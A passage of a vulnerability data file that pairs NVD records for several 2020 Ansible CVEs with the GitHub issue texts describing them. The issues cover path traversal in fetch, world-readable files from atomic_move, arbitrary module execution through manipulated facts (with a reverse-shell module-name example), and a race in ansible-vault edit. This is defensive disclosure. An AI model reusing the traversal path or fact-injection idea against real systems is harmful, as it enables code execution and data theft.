"versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/ansible/ansible/issues/67793
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1735 <!--- Explain the problem briefly below --> Possibly related to CVE-2019-3828 (https://github.com/ansible/ansible/pull/52133/) The `fetch` module takes the `source` result from the `slurp` module, which came from the remote host. We don't really validate this path and it could have been manipulated by the remote host in a malicious way such that we end up a path similar to `/tmp/result_fetch/ansible1/../../../../../../../../../../../../../../../../home/<user>/.profile` for the source. This allows an attacker to place a file the contents of which they control. **Relevant Code:** https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/plugins/action/fetch.py#L83-L102 Suggested correction from the reporter: - Don't use `%s/%s/%s` to compute the destination file or clean the last argument - add the following check: ```python target_dir = os.path.normpath(os.path.join(self._loader.path_dwim(dest), target_name)) dest = os.path.normpath(os.path.join(target_dir, source_local) assert os.path.commonpath([target_dir, dest]) == target_dir ``` ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/plugins/action/fetch.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
fetch module path traversal
https://api.github.com/repos/ansible/ansible/issues/67793/comments
2
2020-02-26T19:50:23Z
2020-05-06T13:00:11Z
https://github.com/ansible/ansible/issues/67793
571,617,198
67,793
1,114
CVE-2020-1736
2020-03-16T16:15:13.983
A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified. This sets the destination files world-readable if the destination file does not exist and if the file exists, the file could be changed to have less restrictive permissions before the move. This could lead to the disclosure of sensitive data. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 2.2, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 1.4, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1736" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67794" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2NYYQP2XJB2TTRP6AKWVMBSPB2DFJNKD/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BPNZWBAUP4ZHUR6PO7U6ZXEKNCX62KZ7/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67794" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2NYYQP2XJB2TTRP6AKWVMBSPB2DFJNKD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BPNZWBAUP4ZHUR6PO7U6ZXEKNCX62KZ7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "89338CDC-A956-4F24-A2A2-EA5CFD78F235", "versionEndExcluding": null, "versionEndIncluding": "2.7.16", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "7CD41653-4140-46E4-BCD3-47665FCFCA2C", "versionEndExcluding": "2.8.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F341321-B428-44C7-8EA0-A8ED9B0ADA10", "versionEndExcluding": "2.9.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "64DD1400-5512-493E-85DB-B3C18FBB2DBB", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.3.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDE01259-A945-4567-AB95-8DAB087A686A", "versionEndExcluding": null, "versionEndIncluding": "3.7.2", "versionStartExcluding": null, "versionStartIncluding": "3.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/ansible/ansible/issues/67794
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1736 <!--- Explain the problem briefly below --> If a file doesn't exist, we create it with `0666` permissions combined with the current `umask`. Depending on the default umask as well as the permissions on the destination directory, this could result in world readable files. **Relevant code:** Default permissions: https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/module_utils/common/file.py#L60-L62 creation in `atomic_move`: https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/module_utils/basic.py#L2296-L2303 ```python if creating: # make sure the file has the correct permissions # based on the current value of umask umask = os.umask(0) os.umask(umask) os.chmod(b_dest, DEFAULT_PERM & ~umask) try: os.chown(b_dest, os.geteuid(), os.getegid()) except OSError: # We're okay with trying our best here. If the user is not # root (or old Unices) they won't be able to chown. pass ``` Suggested correction is to use more restrictive permissions by default and/or add a mechanism to prevent creating world readable files. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `ansible/lib/ansible/module_utils/common/file.py` `ansible/lib/ansible/module_utils/basic.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
The default permissions used by atomic_move can create files that are world readable
https://api.github.com/repos/ansible/ansible/issues/67794/comments
20
2020-02-26T19:54:05Z
2022-07-27T13:00:01Z
https://github.com/ansible/ansible/issues/67794
571,619,142
67,794
1,115
CVE-2020-1738
2020-03-16T16:15:14.093
A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:H/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 1.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 2.7, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67796" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67796" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202006-11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "89338CDC-A956-4F24-A2A2-EA5CFD78F235", "versionEndExcluding": null, "versionEndIncluding": "2.7.16", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "D144C559-37B8-4DED-9D8B-61CE1134B3A5", "versionEndExcluding": null, "versionEndIncluding": "2.8.8", "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "FA56E1B5-A742-4D2E-BF0B-C806689A3E05", "versionEndExcluding": null, "versionEndIncluding": "2.9.5", "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "64DD1400-5512-493E-85DB-B3C18FBB2DBB", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.3.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "88" ]
88
https://github.com/ansible/ansible/issues/67796
[ "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1738 Both `package` and `service` modules use facts to determine the name of the module to run if `use` is not passed to the module. The `ansible_facts['pkg_mgr']` and `ansible_facts['service_mgr']` facts could be set to another module name or a module name installed in a collection such as `ansible_collections.namespace.name./tmp/reverse-shell`, which would allow arbitrary code execution on the managed node. A potential fix would be to whitelist valid modules for `package` and `service` and/or have the collection loader validate the collection path to not allow arbitrary files. The collection loader part may already be fixed in 2.9. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/plugins/action/service.py` `lib/ansible/plugins/action/package.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
package and service modules allow arbitrary modules to be executed
https://api.github.com/repos/ansible/ansible/issues/67796/comments
2
2020-02-26T19:57:02Z
2020-05-14T13:00:08Z
https://github.com/ansible/ansible/issues/67796
571,620,850
67,796
1,116
CVE-2020-1740
2020-03-16T16:15:14.217
A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 2.7, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1740" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67798" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67798" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "1AA398A0-5DCC-4202-BB11-B2871FB796B4", "versionEndExcluding": "2.7.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "84818035-3E65-464B-A84A-22DADA640D19", "versionEndExcluding": "2.8.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "341AEE03-9334-416D-9896-A37697B43CCC", "versionEndExcluding": "2.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "64DD1400-5512-493E-85DB-B3C18FBB2DBB", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.3.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "377" ]
377
https://github.com/ansible/ansible/issues/67798
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1740 A race condition exists in `ansible-vault edit` which could allow another user on the same computer can read the old and new secret. When executing `ansible-vault edit`, the method `VaultEditor._edit_file_helper()` creates the temporary file with `tempfile.mkstemp()`. However, the returned file descriptor is closed and `VaultEditor.write_data()` is called to write to the file. `VaultEditor.write_data()` will delete the file and recreate it. A malicious user can create the file with permissions allowing them access to the file after the unlink. The proposed solution is to write directly to the file descriptor in `VaultEditor._edit_file_helper()` rather than deleting and creating a new file. **Relevant code:** https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/parsing/vault/__init__.py#L851-L859 ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/parsing/vault/__init__.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from 